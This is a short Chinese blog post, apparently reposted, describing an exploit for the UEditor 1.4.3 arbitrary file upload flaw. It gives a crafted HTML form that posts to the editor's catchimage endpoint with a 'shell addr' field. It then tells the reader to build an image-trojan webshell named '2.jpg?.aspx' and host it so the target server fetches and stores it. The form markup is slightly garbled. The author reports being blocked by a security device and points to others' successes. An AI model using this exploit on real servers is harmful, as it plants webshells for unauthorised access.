UEditor 1.4.3 任意文件上传漏洞

今天测试一个项目,进到后台之后发现使用富文本web编辑器

UEditor 1.4.3 任意文件上传漏洞_第1张图片


构造一个恶意的html文件,方便我们传输数据过去: xxxx为攻击地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" />p >   <inputtype="submit" value="Submit" />

form>

然后制作一个图片马,文件名改为2.jpg?.aspx上传至自己的服务器,通过构造的恶意html进行上传

UEditor 1.4.3 任意文件上传漏洞_第2张图片

我的被安全设备拦截了

UEditor 1.4.3 任意文件上传漏洞_第3张图片


看看别人成功的案例

UEditor 1.4.3 任意文件上传漏洞_第4张图片

你可能感兴趣的:(UEditor 1.4.3 任意文件上传漏洞)